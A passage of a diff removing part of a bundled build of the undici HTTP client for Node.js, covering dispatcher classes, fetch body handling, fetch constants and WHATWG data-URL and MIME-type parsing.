validateHandler, - getSocketInfo, - isFormDataLike, - buildURL, - throwIfAborted, - addAbortListener, - parseRangeHeader, - nodeMajor, - nodeMinor, - nodeHasAutoSelectFamily: nodeMajor > 18 || (nodeMajor === 18 && nodeMinor >= 13), - safeHTTPMethods: ['GET', 'HEAD', 'OPTIONS', 'TRACE'] -} - - -/***/ }), - -/***/ 4839: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const Dispatcher = __nccwpck_require__(412) -const { - ClientDestroyedError, - ClientClosedError, - InvalidArgumentError -} = __nccwpck_require__(8045) -const { kDestroy, kClose, kDispatch, kInterceptors } = __nccwpck_require__(2785) - -const kDestroyed = Symbol('destroyed') -const kClosed = Symbol('closed') -const kOnDestroyed = Symbol('onDestroyed') -const kOnClosed = Symbol('onClosed') -const kInterceptedDispatch = Symbol('Intercepted Dispatch') - -class DispatcherBase extends Dispatcher { - constructor () { - super() - - this[kDestroyed] = false - this[kOnDestroyed] = null - this[kClosed] = false - this[kOnClosed] = [] - } - - get destroyed () { - return this[kDestroyed] - } - - get closed () { - return this[kClosed] - } - - get interceptors () { - return this[kInterceptors] - } - - set interceptors (newInterceptors) { - if (newInterceptors) { - for (let i = newInterceptors.length - 1; i >= 0; i--) { - const interceptor = this[kInterceptors][i] - if (typeof interceptor !== 'function') { - throw new InvalidArgumentError('interceptor must be an function') - } - } - } - - this[kInterceptors] = newInterceptors - } - - close (callback) { - if (callback === undefined) { - return new Promise((resolve, reject) => { - this.close((err, data) => { - return err ? reject(err) : resolve(data) - }) - }) - } - - if (typeof callback !== 'function') { - throw new InvalidArgumentError('invalid callback') - } - - if (this[kDestroyed]) { - queueMicrotask(() => callback(new ClientDestroyedError(), null)) - return - } - - if (this[kClosed]) { - if (this[kOnClosed]) { - this[kOnClosed].push(callback) - } else { - queueMicrotask(() => callback(null, null)) - } - return - } - - this[kClosed] = true - this[kOnClosed].push(callback) - - const onClosed = () => { - const callbacks = this[kOnClosed] - this[kOnClosed] = null - for (let i = 0; i < callbacks.length; i++) { - callbacks[i](null, null) - } - } - - // Should not error. - this[kClose]() - .then(() => this.destroy()) - .then(() => { - queueMicrotask(onClosed) - }) - } - - destroy (err, callback) { - if (typeof err === 'function') { - callback = err - err = null - } - - if (callback === undefined) { - return new Promise((resolve, reject) => { - this.destroy(err, (err, data) => { - return err ? /* istanbul ignore next: should never error */ reject(err) : resolve(data) - }) - }) - } - - if (typeof callback !== 'function') { - throw new InvalidArgumentError('invalid callback') - } - - if (this[kDestroyed]) { - if (this[kOnDestroyed]) { - this[kOnDestroyed].push(callback) - } else { - queueMicrotask(() => callback(null, null)) - } - return - } - - if (!err) { - err = new ClientDestroyedError() - } - - this[kDestroyed] = true - this[kOnDestroyed] = this[kOnDestroyed] || [] - this[kOnDestroyed].push(callback) - - const onDestroyed = () => { - const callbacks = this[kOnDestroyed] - this[kOnDestroyed] = null - for (let i = 0; i < callbacks.length; i++) { - callbacks[i](null, null) - } - } - - // Should not error. - this[kDestroy](err).then(() => { - queueMicrotask(onDestroyed) - }) - } - - [kInterceptedDispatch] (opts, handler) { - if (!this[kInterceptors] || this[kInterceptors].length === 0) { - this[kInterceptedDispatch] = this[kDispatch] - return this[kDispatch](opts, handler) - } - - let dispatch = this[kDispatch].bind(this) - for (let i = this[kInterceptors].length - 1; i >= 0; i--) { - dispatch = this[kInterceptors][i](dispatch) - } - this[kInterceptedDispatch] = dispatch - return dispatch(opts, handler) - } - - dispatch (opts, handler) { - if (!handler || typeof handler !== 'object') { - throw new InvalidArgumentError('handler must be an object') - } - - try { - if (!opts || typeof opts !== 'object') { - throw new InvalidArgumentError('opts must be an object.') - } - - if (this[kDestroyed] || this[kOnDestroyed]) { - throw new ClientDestroyedError() - } - - if (this[kClosed]) { - throw new ClientClosedError() - } - - return this[kInterceptedDispatch](opts, handler) - } catch (err) { - if (typeof handler.onError !== 'function') { - throw new InvalidArgumentError('invalid onError method') - } - - handler.onError(err) - - return false - } - } -} - -module.exports = DispatcherBase - - -/***/ }), - -/***/ 412: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const EventEmitter = __nccwpck_require__(2361) - -class Dispatcher extends EventEmitter { - dispatch () { - throw new Error('not implemented') - } - - close () { - throw new Error('not implemented') - } - - destroy () { - throw new Error('not implemented') - } -} - -module.exports = Dispatcher - - -/***/ }), - -/***/ 1472: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const Busboy = __nccwpck_require__(727) -const util = __nccwpck_require__(3983) -const { - ReadableStreamFrom, - isBlobLike, - isReadableStreamLike, - readableStreamClose, - createDeferredPromise, - fullyReadBody -} = __nccwpck_require__(2538) -const { FormData } = __nccwpck_require__(2015) -const { kState } = __nccwpck_require__(5861) -const { webidl } = __nccwpck_require__(1744) -const { DOMException, structuredClone } = __nccwpck_require__(1037) -const { Blob, File: NativeFile } = __nccwpck_require__(4300) -const { kBodyUsed } = __nccwpck_require__(2785) -const assert = __nccwpck_require__(9491) -const { isErrored } = __nccwpck_require__(3983) -const { isUint8Array, isArrayBuffer } = __nccwpck_require__(9830) -const { File: UndiciFile } = __nccwpck_require__(8511) -const { parseMIMEType, serializeAMimeType } = __nccwpck_require__(685) - -let ReadableStream = globalThis.ReadableStream - -/** @type {globalThis['File']} */ -const File = NativeFile ?? UndiciFile -const textEncoder = new TextEncoder() -const textDecoder = new TextDecoder() - -// https://fetch.spec.whatwg.org/#concept-bodyinit-extract -function extractBody (object, keepalive = false) { - if (!ReadableStream) { - ReadableStream = (__nccwpck_require__(5356).ReadableStream) - } - - // 1. Let stream be null. - let stream = null - - // 2. If object is a ReadableStream object, then set stream to object. - if (object instanceof ReadableStream) { - stream = object - } else if (isBlobLike(object)) { - // 3. Otherwise, if object is a Blob object, set stream to the - // result of running object’s get stream. - stream = object.stream() - } else { - // 4. Otherwise, set stream to a new ReadableStream object, and set - // up stream. - stream = new ReadableStream({ - async pull (controller) { - controller.enqueue( - typeof source === 'string' ? textEncoder.encode(source) : source - ) - queueMicrotask(() => readableStreamClose(controller)) - }, - start () {}, - type: undefined - }) - } - - // 5. Assert: stream is a ReadableStream object. - assert(isReadableStreamLike(stream)) - - // 6. Let action be null. - let action = null - - // 7. Let source be null. - let source = null - - // 8. Let length be null. - let length = null - - // 9. Let type be null. - let type = null - - // 10. Switch on object: - if (typeof object === 'string') { - // Set source to the UTF-8 encoding of object. - // Note: setting source to a Uint8Array here breaks some mocking assumptions. - source = object - - // Set type to `text/plain;charset=UTF-8`. - type = 'text/plain;charset=UTF-8' - } else if (object instanceof URLSearchParams) { - // URLSearchParams - - // spec says to run application/x-www-form-urlencoded on body.list - // this is implemented in Node.js as apart of an URLSearchParams instance toString method - // See: https://github.com/nodejs/node/blob/e46c680bf2b211bbd52cf959ca17ee98c7f657f5/lib/internal/url.js#L490 - // and https://github.com/nodejs/node/blob/e46c680bf2b211bbd52cf959ca17ee98c7f657f5/lib/internal/url.js#L1100 - - // Set source to the result of running the application/x-www-form-urlencoded serializer with object’s list. - source = object.toString() - - // Set type to `application/x-www-form-urlencoded;charset=UTF-8`. - type = 'application/x-www-form-urlencoded;charset=UTF-8' - } else if (isArrayBuffer(object)) { - // BufferSource/ArrayBuffer - - // Set source to a copy of the bytes held by object. - source = new Uint8Array(object.slice()) - } else if (ArrayBuffer.isView(object)) { - // BufferSource/ArrayBufferView - - // Set source to a copy of the bytes held by object. - source = new Uint8Array(object.buffer.slice(object.byteOffset, object.byteOffset + object.byteLength)) - } else if (util.isFormDataLike(object)) { - const boundary = `----formdata-undici-0${`${Math.floor(Math.random() * 1e11)}`.padStart(11, '0')}` - const prefix = `--${boundary}\r\nContent-Disposition: form-data` - - /*! formdata-polyfill. MIT License. Jimmy Wärting */ - const escape = (str) => - str.replace(/\n/g, '%0A').replace(/\r/g, '%0D').replace(/"/g, '%22') - const normalizeLinefeeds = (value) => value.replace(/\r?\n|\r/g, '\r\n') - - // Set action to this step: run the multipart/form-data - // encoding algorithm, with object’s entry list and UTF-8. - // - This ensures that the body is immutable and can't be changed afterwords - // - That the content-length is calculated in advance. - // - And that all parts are pre-encoded and ready to be sent. - - const blobParts = [] - const rn = new Uint8Array([13, 10]) // '\r\n' - length = 0 - let hasUnknownSizeValue = false - - for (const [name, value] of object) { - if (typeof value === 'string') { - const chunk = textEncoder.encode(prefix + - `; name="${escape(normalizeLinefeeds(name))}"` + - `\r\n\r\n${normalizeLinefeeds(value)}\r\n`) - blobParts.push(chunk) - length += chunk.byteLength - } else { - const chunk = textEncoder.encode(`${prefix}; name="${escape(normalizeLinefeeds(name))}"` + - (value.name ? `; filename="${escape(value.name)}"` : '') + '\r\n' + - `Content-Type: ${ - value.type || 'application/octet-stream' - }\r\n\r\n`) - blobParts.push(chunk, value, rn) - if (typeof value.size === 'number') { - length += chunk.byteLength + value.size + rn.byteLength - } else { - hasUnknownSizeValue = true - } - } - } - - const chunk = textEncoder.encode(`--${boundary}--`) - blobParts.push(chunk) - length += chunk.byteLength - if (hasUnknownSizeValue) { - length = null - } - - // Set source to object. - source = object - - action = async function * () { - for (const part of blobParts) { - if (part.stream) { - yield * part.stream() - } else { - yield part - } - } - } - - // Set type to `multipart/form-data; boundary=`, - // followed by the multipart/form-data boundary string generated - // by the multipart/form-data encoding algorithm. - type = 'multipart/form-data; boundary=' + boundary - } else if (isBlobLike(object)) { - // Blob - - // Set source to object. - source = object - - // Set length to object’s size. - length = object.size - - // If object’s type attribute is not the empty byte sequence, set - // type to its value. - if (object.type) { - type = object.type - } - } else if (typeof object[Symbol.asyncIterator] === 'function') { - // If keepalive is true, then throw a TypeError. - if (keepalive) { - throw new TypeError('keepalive') - } - - // If object is disturbed or locked, then throw a TypeError. - if (util.isDisturbed(object) || object.locked) { - throw new TypeError( - 'Response body object should not be disturbed or locked' - ) - } - - stream = - object instanceof ReadableStream ? object : ReadableStreamFrom(object) - } - - // 11. If source is a byte sequence, then set action to a - // step that returns source and length to source’s length. - if (typeof source === 'string' || util.isBuffer(source)) { - length = Buffer.byteLength(source) - } - - // 12. If action is non-null, then run these steps in in parallel: - if (action != null) { - // Run action. - let iterator - stream = new ReadableStream({ - async start () { - iterator = action(object)[Symbol.asyncIterator]() - }, - async pull (controller) { - const { value, done } = await iterator.next() - if (done) { - // When running action is done, close stream. - queueMicrotask(() => { - controller.close() - }) - } else { - // Whenever one or more bytes are available and stream is not errored, - // enqueue a Uint8Array wrapping an ArrayBuffer containing the available - // bytes into stream. - if (!isErrored(stream)) { - controller.enqueue(new Uint8Array(value)) - } - } - return controller.desiredSize > 0 - }, - async cancel (reason) { - await iterator.return() - }, - type: undefined - }) - } - - // 13. Let body be a body whose stream is stream, source is source, - // and length is length. - const body = { stream, source, length } - - // 14. Return (body, type). - return [body, type] -} - -// https://fetch.spec.whatwg.org/#bodyinit-safely-extract -function safelyExtractBody (object, keepalive = false) { - if (!ReadableStream) { - // istanbul ignore next - ReadableStream = (__nccwpck_require__(5356).ReadableStream) - } - - // To safely extract a body and a `Content-Type` value from - // a byte sequence or BodyInit object object, run these steps: - - // 1. If object is a ReadableStream object, then: - if (object instanceof ReadableStream) { - // Assert: object is neither disturbed nor locked. - // istanbul ignore next - assert(!util.isDisturbed(object), 'The body has already been consumed.') - // istanbul ignore next - assert(!object.locked, 'The stream is locked.') - } - - // 2. Return the results of extracting object. - return extractBody(object, keepalive) -} - -function cloneBody (body) { - // To clone a body body, run these steps: - - // https://fetch.spec.whatwg.org/#concept-body-clone - - // 1. Let « out1, out2 » be the result of teeing body’s stream. - const [out1, out2] = body.stream.tee() - const out2Clone = structuredClone(out2, { transfer: [out2] }) - // This, for whatever reasons, unrefs out2Clone which allows - // the process to exit by itself. - const [, finalClone] = out2Clone.tee() - - // 2. Set body’s stream to out1. - body.stream = out1 - - // 3. Return a body whose stream is out2 and other members are copied from body. - return { - stream: finalClone, - length: body.length, - source: body.source - } -} - -async function * consumeBody (body) { - if (body) { - if (isUint8Array(body)) { - yield body - } else { - const stream = body.stream - - if (util.isDisturbed(stream)) { - throw new TypeError('The body has already been consumed.') - } - - if (stream.locked) { - throw new TypeError('The stream is locked.') - } - - // Compat. - stream[kBodyUsed] = true - - yield * stream - } - } -} - -function throwIfAborted (state) { - if (state.aborted) { - throw new DOMException('The operation was aborted.', 'AbortError') - } -} - -function bodyMixinMethods (instance) { - const methods = { - blob () { - // The blob() method steps are to return the result of - // running consume body with this and the following step - // given a byte sequence bytes: return a Blob whose - // contents are bytes and whose type attribute is this’s - // MIME type. - return specConsumeBody(this, (bytes) => { - let mimeType = bodyMimeType(this) - - if (mimeType === 'failure') { - mimeType = '' - } else if (mimeType) { - mimeType = serializeAMimeType(mimeType) - } - - // Return a Blob whose contents are bytes and type attribute - // is mimeType. - return new Blob([bytes], { type: mimeType }) - }, instance) - }, - - arrayBuffer () { - // The arrayBuffer() method steps are to return the result - // of running consume body with this and the following step - // given a byte sequence bytes: return a new ArrayBuffer - // whose contents are bytes. - return specConsumeBody(this, (bytes) => { - return new Uint8Array(bytes).buffer - }, instance) - }, - - text () { - // The text() method steps are to return the result of running - // consume body with this and UTF-8 decode. - return specConsumeBody(this, utf8DecodeBytes, instance) - }, - - json () { - // The json() method steps are to return the result of running - // consume body with this and parse JSON from bytes. - return specConsumeBody(this, parseJSONFromBytes, instance) - }, - - async formData () { - webidl.brandCheck(this, instance) - - throwIfAborted(this[kState]) - - const contentType = this.headers.get('Content-Type') - - // If mimeType’s essence is "multipart/form-data", then: - if (/multipart\/form-data/.test(contentType)) { - const headers = {} - for (const [key, value] of this.headers) headers[key.toLowerCase()] = value - - const responseFormData = new FormData() - - let busboy - - try { - busboy = new Busboy({ - headers, - preservePath: true - }) - } catch (err) { - throw new DOMException(`${err}`, 'AbortError') - } - - busboy.on('field', (name, value) => { - responseFormData.append(name, value) - }) - busboy.on('file', (name, value, filename, encoding, mimeType) => { - const chunks = [] - - if (encoding === 'base64' || encoding.toLowerCase() === 'base64') { - let base64chunk = '' - - value.on('data', (chunk) => { - base64chunk += chunk.toString().replace(/[\r\n]/gm, '') - - const end = base64chunk.length - base64chunk.length % 4 - chunks.push(Buffer.from(base64chunk.slice(0, end), 'base64')) - - base64chunk = base64chunk.slice(end) - }) - value.on('end', () => { - chunks.push(Buffer.from(base64chunk, 'base64')) - responseFormData.append(name, new File(chunks, filename, { type: mimeType })) - }) - } else { - value.on('data', (chunk) => { - chunks.push(chunk) - }) - value.on('end', () => { - responseFormData.append(name, new File(chunks, filename, { type: mimeType })) - }) - } - }) - - const busboyResolve = new Promise((resolve, reject) => { - busboy.on('finish', resolve) - busboy.on('error', (err) => reject(new TypeError(err))) - }) - - if (this.body !== null) for await (const chunk of consumeBody(this[kState].body)) busboy.write(chunk) - busboy.end() - await busboyResolve - - return responseFormData - } else if (/application\/x-www-form-urlencoded/.test(contentType)) { - // Otherwise, if mimeType’s essence is "application/x-www-form-urlencoded", then: - - // 1. Let entries be the result of parsing bytes. - let entries - try { - let text = '' - // application/x-www-form-urlencoded parser will keep the BOM. - // https://url.spec.whatwg.org/#concept-urlencoded-parser - // Note that streaming decoder is stateful and cannot be reused - const streamingDecoder = new TextDecoder('utf-8', { ignoreBOM: true }) - - for await (const chunk of consumeBody(this[kState].body)) { - if (!isUint8Array(chunk)) { - throw new TypeError('Expected Uint8Array chunk') - } - text += streamingDecoder.decode(chunk, { stream: true }) - } - text += streamingDecoder.decode() - entries = new URLSearchParams(text) - } catch (err) { - // istanbul ignore next: Unclear when new URLSearchParams can fail on a string. - // 2. If entries is failure, then throw a TypeError. - throw Object.assign(new TypeError(), { cause: err }) - } - - // 3. Return a new FormData object whose entries are entries. - const formData = new FormData() - for (const [name, value] of entries) { - formData.append(name, value) - } - return formData - } else { - // Wait a tick before checking if the request has been aborted. - // Otherwise, a TypeError can be thrown when an AbortError should. - await Promise.resolve() - - throwIfAborted(this[kState]) - - // Otherwise, throw a TypeError. - throw webidl.errors.exception({ - header: `${instance.name}.formData`, - message: 'Could not parse content as FormData.' - }) - } - } - } - - return methods -} - -function mixinBody (prototype) { - Object.assign(prototype.prototype, bodyMixinMethods(prototype)) -} - -/** - * @see https://fetch.spec.whatwg.org/#concept-body-consume-body - * @param {Response|Request} object - * @param {(value: unknown) => unknown} convertBytesToJSValue - * @param {Response|Request} instance - */ -async function specConsumeBody (object, convertBytesToJSValue, instance) { - webidl.brandCheck(object, instance) - - throwIfAborted(object[kState]) - - // 1. If object is unusable, then return a promise rejected - // with a TypeError. - if (bodyUnusable(object[kState].body)) { - throw new TypeError('Body is unusable') - } - - // 2. Let promise be a new promise. - const promise = createDeferredPromise() - - // 3. Let errorSteps given error be to reject promise with error. - const errorSteps = (error) => promise.reject(error) - - // 4. Let successSteps given a byte sequence data be to resolve - // promise with the result of running convertBytesToJSValue - // with data. If that threw an exception, then run errorSteps - // with that exception. - const successSteps = (data) => { - try { - promise.resolve(convertBytesToJSValue(data)) - } catch (e) { - errorSteps(e) - } - } - - // 5. If object’s body is null, then run successSteps with an - // empty byte sequence. - if (object[kState].body == null) { - successSteps(new Uint8Array()) - return promise.promise - } - - // 6. Otherwise, fully read object’s body given successSteps, - // errorSteps, and object’s relevant global object. - await fullyReadBody(object[kState].body, successSteps, errorSteps) - - // 7. Return promise. - return promise.promise -} - -// https://fetch.spec.whatwg.org/#body-unusable -function bodyUnusable (body) { - // An object including the Body interface mixin is - // said to be unusable if its body is non-null and - // its body’s stream is disturbed or locked. - return body != null && (body.stream.locked || util.isDisturbed(body.stream)) -} - -/** - * @see https://encoding.spec.whatwg.org/#utf-8-decode - * @param {Buffer} buffer - */ -function utf8DecodeBytes (buffer) { - if (buffer.length === 0) { - return '' - } - - // 1. Let buffer be the result of peeking three bytes from - // ioQueue, converted to a byte sequence. - - // 2. If buffer is 0xEF 0xBB 0xBF, then read three - // bytes from ioQueue. (Do nothing with those bytes.) - if (buffer[0] === 0xEF && buffer[1] === 0xBB && buffer[2] === 0xBF) { - buffer = buffer.subarray(3) - } - - // 3. Process a queue with an instance of UTF-8’s - // decoder, ioQueue, output, and "replacement". - const output = textDecoder.decode(buffer) - - // 4. Return output. - return output -} - -/** - * @see https://infra.spec.whatwg.org/#parse-json-bytes-to-a-javascript-value - * @param {Uint8Array} bytes - */ -function parseJSONFromBytes (bytes) { - return JSON.parse(utf8DecodeBytes(bytes)) -} - -/** - * @see https://fetch.spec.whatwg.org/#concept-body-mime-type - * @param {import('./response').Response|import('./request').Request} object - */ -function bodyMimeType (object) { - const { headersList } = object[kState] - const contentType = headersList.get('content-type') - - if (contentType === null) { - return 'failure' - } - - return parseMIMEType(contentType) -} - -module.exports = { - extractBody, - safelyExtractBody, - cloneBody, - mixinBody -} - - -/***/ }), - -/***/ 1037: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { MessageChannel, receiveMessageOnPort } = __nccwpck_require__(1267) - -const corsSafeListedMethods = ['GET', 'HEAD', 'POST'] -const corsSafeListedMethodsSet = new Set(corsSafeListedMethods) - -const nullBodyStatus = [101, 204, 205, 304] - -const redirectStatus = [301, 302, 303, 307, 308] -const redirectStatusSet = new Set(redirectStatus) - -// https://fetch.spec.whatwg.org/#block-bad-port -const badPorts = [ - '1', '7', '9', '11', '13', '15', '17', '19', '20', '21', '22', '23', '25', '37', '42', '43', '53', '69', '77', '79', - '87', '95', '101', '102', '103', '104', '109', '110', '111', '113', '115', '117', '119', '123', '135', '137', - '139', '143', '161', '179', '389', '427', '465', '512', '513', '514', '515', '526', '530', '531', '532', - '540', '548', '554', '556', '563', '587', '601', '636', '989', '990', '993', '995', '1719', '1720', '1723', - '2049', '3659', '4045', '5060', '5061', '6000', '6566', '6665', '6666', '6667', '6668', '6669', '6697', - '10080' -] - -const badPortsSet = new Set(badPorts) - -// https://w3c.github.io/webappsec-referrer-policy/#referrer-policies -const referrerPolicy = [ - '', - 'no-referrer', - 'no-referrer-when-downgrade', - 'same-origin', - 'origin', - 'strict-origin', - 'origin-when-cross-origin', - 'strict-origin-when-cross-origin', - 'unsafe-url' -] -const referrerPolicySet = new Set(referrerPolicy) - -const requestRedirect = ['follow', 'manual', 'error'] - -const safeMethods = ['GET', 'HEAD', 'OPTIONS', 'TRACE'] -const safeMethodsSet = new Set(safeMethods) - -const requestMode = ['navigate', 'same-origin', 'no-cors', 'cors'] - -const requestCredentials = ['omit', 'same-origin', 'include'] - -const requestCache = [ - 'default', - 'no-store', - 'reload', - 'no-cache', - 'force-cache', - 'only-if-cached' -] - -// https://fetch.spec.whatwg.org/#request-body-header-name -const requestBodyHeader = [ - 'content-encoding', - 'content-language', - 'content-location', - 'content-type', - // See https://github.com/nodejs/undici/issues/2021 - // 'Content-Length' is a forbidden header name, which is typically - // removed in the Headers implementation. However, undici doesn't - // filter out headers, so we add it here. - 'content-length' -] - -// https://fetch.spec.whatwg.org/#enumdef-requestduplex -const requestDuplex = [ - 'half' -] - -// http://fetch.spec.whatwg.org/#forbidden-method -const forbiddenMethods = ['CONNECT', 'TRACE', 'TRACK'] -const forbiddenMethodsSet = new Set(forbiddenMethods) - -const subresource = [ - 'audio', - 'audioworklet', - 'font', - 'image', - 'manifest', - 'paintworklet', - 'script', - 'style', - 'track', - 'video', - 'xslt', - '' -] -const subresourceSet = new Set(subresource) - -/** @type {globalThis['DOMException']} */ -const DOMException = globalThis.DOMException ?? (() => { - // DOMException was only made a global in Node v17.0.0, - // but fetch supports >= v16.8. - try { - atob('~') - } catch (err) { - return Object.getPrototypeOf(err).constructor - } -})() - -let channel - -/** @type {globalThis['structuredClone']} */ -const structuredClone = - globalThis.structuredClone ?? - // https://github.com/nodejs/node/blob/b27ae24dcc4251bad726d9d84baf678d1f707fed/lib/internal/structured_clone.js - // structuredClone was added in v17.0.0, but fetch supports v16.8 - function structuredClone (value, options = undefined) { - if (arguments.length === 0) { - throw new TypeError('missing argument') - } - - if (!channel) { - channel = new MessageChannel() - } - channel.port1.unref() - channel.port2.unref() - channel.port1.postMessage(value, options?.transfer) - return receiveMessageOnPort(channel.port2).message - } - -module.exports = { - DOMException, - structuredClone, - subresource, - forbiddenMethods, - requestBodyHeader, - referrerPolicy, - requestRedirect, - requestMode, - requestCredentials, - requestCache, - redirectStatus, - corsSafeListedMethods, - nullBodyStatus, - safeMethods, - badPorts, - requestDuplex, - subresourceSet, - badPortsSet, - redirectStatusSet, - corsSafeListedMethodsSet, - safeMethodsSet, - forbiddenMethodsSet, - referrerPolicySet -} - - -/***/ }), - -/***/ 685: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -const assert = __nccwpck_require__(9491) -const { atob } = __nccwpck_require__(4300) -const { isomorphicDecode } = __nccwpck_require__(2538) - -const encoder = new TextEncoder() - -/** - * @see https://mimesniff.spec.whatwg.org/#http-token-code-point - */ -const HTTP_TOKEN_CODEPOINTS = /^[!#$%&'*+-.^_|~A-Za-z0-9]+$/ -const HTTP_WHITESPACE_REGEX = /(\u000A|\u000D|\u0009|\u0020)/ // eslint-disable-line -/** - * @see https://mimesniff.spec.whatwg.org/#http-quoted-string-token-code-point - */ -const HTTP_QUOTED_STRING_TOKENS = /[\u0009|\u0020-\u007E|\u0080-\u00FF]/ // eslint-disable-line - -// https://fetch.spec.whatwg.org/#data-url-processor -/** @param {URL} dataURL */ -function dataURLProcessor (dataURL) { - // 1. Assert: dataURL’s scheme is "data". - assert(dataURL.protocol === 'data:') - - // 2. Let input be the result of running the URL - // serializer on dataURL with exclude fragment - // set to true. - let input = URLSerializer(dataURL, true) - - // 3. Remove the leading "data:" string from input. - input = input.slice(5) - - // 4. Let position point at the start of input. - const position = { position: 0 } - - // 5. Let mimeType be the result of collecting a - // sequence of code points that are not equal - // to U+002C (,), given position. - let mimeType = collectASequenceOfCodePointsFast( - ',', - input, - position - ) - - // 6. Strip leading and trailing ASCII whitespace - // from mimeType. - // Undici implementation note: we need to store the - // length because if the mimetype has spaces removed, - // the wrong amount will be sliced from the input in - // step #9 - const mimeTypeLength = mimeType.length - mimeType = removeASCIIWhitespace(mimeType, true, true) - - // 7. If position is past the end of input, then - // return failure - if (position.position >= input.length) { - return 'failure' - } - - // 8. Advance position by 1. - position.position++ - - // 9. Let encodedBody be the remainder of input. - const encodedBody = input.slice(mimeTypeLength + 1) - - // 10. Let body be the percent-decoding of encodedBody. - let body = stringPercentDecode(encodedBody) - - // 11. If mimeType ends with U+003B (;), followed by - // zero or more U+0020 SPACE, followed by an ASCII - // case-insensitive match for "base64", then: - if (/;(\u0020){0,}base64$/i.test(mimeType)) { - // 1. Let stringBody be the isomorphic decode of body. - const stringBody = isomorphicDecode(body) - - // 2. Set body to the forgiving-base64 decode of - // stringBody. - body = forgivingBase64(stringBody) - - // 3. If body is failure, then return failure. - if (body === 'failure') { - return 'failure' - } - - // 4. Remove the last 6 code points from mimeType. - mimeType = mimeType.slice(0, -6) - - // 5. Remove trailing U+0020 SPACE code points from mimeType, - // if any. - mimeType = mimeType.replace(/(\u0020)+$/, '') - - // 6. Remove the last U+003B (;) code point from mimeType. - mimeType = mimeType.slice(0, -1) - } - - // 12. If mimeType starts with U+003B (;), then prepend - // "text/plain" to mimeType. - if (mimeType.startsWith(';')) { - mimeType = 'text/plain' + mimeType - } - - // 13. Let mimeTypeRecord be the result of parsing - // mimeType. - let mimeTypeRecord = parseMIMEType(mimeType) - - // 14. If mimeTypeRecord is failure, then set - // mimeTypeRecord to text/plain;charset=US-ASCII. - if (mimeTypeRecord === 'failure') { - mimeTypeRecord = parseMIMEType('text/plain;charset=US-ASCII') - } - - // 15. Return a new data: URL struct whose MIME - // type is mimeTypeRecord and body is body. - // https://fetch.spec.whatwg.org/#data-url-struct - return { mimeType: mimeTypeRecord, body } -} - -// https://url.spec.whatwg.org/#concept-url-serializer -/** - * @param {URL} url - * @param {boolean} excludeFragment - */ -function URLSerializer (url, excludeFragment = false) { - if (!excludeFragment) { - return url.href - } - - const href = url.href - const hashLength = url.hash.length - - return hashLength === 0 ? href : href.substring(0, href.length - hashLength) -} - -// https://infra.spec.whatwg.org/#collect-a-sequence-of-code-points -/** - * @param {(char: string) => boolean} condition - * @param {string} input - * @param {{ position: number }} position - */ -function collectASequenceOfCodePoints (condition, input, position) { - // 1. Let result be the empty string. - let result = '' - - // 2. While position doesn’t point past the end of input and the - // code point at position within input meets the condition condition: - while (position.position < input.length && condition(input[position.position])) { - // 1. Append that code point to the end of result. - result += input[position.position] - - // 2. Advance position by 1. - position.position++ - } - - // 3. Return result. - return result -} - -/** - * A faster collectASequenceOfCodePoints that only works when comparing a single character. - * @param {string} char - * @param {string} input - * @param {{ position: number }} position - */ -function collectASequenceOfCodePointsFast (char, input, position) { - const idx = input.indexOf(char, position.position) - const start = position.position - - if (idx === -1) { - position.position = input.length - return input.slice(start) - } - - position.position = idx - return input.slice(start, position.position) -} - -// https://url.spec.whatwg.org/#string-percent-decode -/** @param {string} input */ -function stringPercentDecode (input) { - // 1. Let bytes be the UTF-8 encoding of input. - const bytes = encoder.encode(input) - - // 2. Return the percent-decoding of bytes. - return percentDecode(bytes) -} - -// https://url.spec.whatwg.org/#percent-decode -/** @param {Uint8Array} input */ -function percentDecode (input) { - // 1. Let output be an empty byte sequence. - /** @type {number[]} */ - const output = [] - - // 2. For each byte byte in input: - for (let i = 0; i < input.length; i++) { - const byte = input[i] - - // 1. If byte is not 0x25 (%), then append byte to output. - if (byte !== 0x25) { - output.push(byte) - - // 2. Otherwise, if byte is 0x25 (%) and the next two bytes - // after byte in input are not in the ranges - // 0x30 (0) to 0x39 (9), 0x41 (A) to 0x46 (F), - // and 0x61 (a) to 0x66 (f), all inclusive, append byte - // to output. - } else if ( - byte === 0x25 && - !/^[0-9A-Fa-f]{2}$/i.test(String.fromCharCode(input[i + 1], input[i + 2])) - ) { - output.push(0x25) - - // 3. Otherwise: - } else { - // 1. Let bytePoint be the two bytes after byte in input, - // decoded, and then interpreted as hexadecimal number. - const nextTwoBytes = String.fromCharCode(input[i + 1], input[i + 2]) - const bytePoint = Number.parseInt(nextTwoBytes, 16) - - // 2. Append a byte whose value is bytePoint to output. - output.push(bytePoint) - - // 3. Skip the next two bytes in input. - i += 2 - } - } - - // 3. Return output. - return Uint8Array.from(output) -} - -// https://mimesniff.spec.whatwg.org/#parse-a-mime-type -/** @param {string} input */ -function parseMIMEType (input) { - // 1. Remove any leading and trailing HTTP whitespace - // from input. - input = removeHTTPWhitespace(input, true, true) - - // 2. Let position be a position variable for input, - // initially pointing at the start of input. - const position = { position: 0 } - - // 3. Let type be the result of collecting a sequence - // of code points that are not U+002F (/) from - // input, given position. - const type = collectASequenceOfCodePointsFast( - '/', - input, - position - ) - - // 4. If type is the empty string or does not solely - // contain HTTP token code points, then return failure. - // https://mimesniff.spec.whatwg.org/#http-token-code-point - if (type.length === 0 || !HTTP_TOKEN_CODEPOINTS.test(type)) { - return 'failure' - } - - // 5. If position is past the end of input, then return - // failure - if (position.position > input.length) { - return 'failure' - } - - // 6. Advance position by 1. (This skips past U+002F (/).) - position.position++ - - // 7. Let subtype be the result of collecting a sequence of - // code points that are not U+003B (;) from input, given - // position. - let subtype = collectASequenceOfCodePointsFast( - ';', - input, - position - ) - - // 8. Remove any trailing HTTP whitespace from subtype. - subtype = removeHTTPWhitespace(subtype, false, true) - - // 9. If subtype is the empty string or does not solely - // contain HTTP token code points, then return failure. - if (subtype.length === 0 || !HTTP_TOKEN_CODEPOINTS.test(subtype)) { - return 'failure' - } - - const typeLowercase = type.toLowerCase() - const subtypeLowercase = subtype.toLowerCase() - - // 10. Let mimeType be a new MIME type record whose type - // is type, in ASCII lowercase, and subtype is subtype, - // in ASCII lowercase. - // 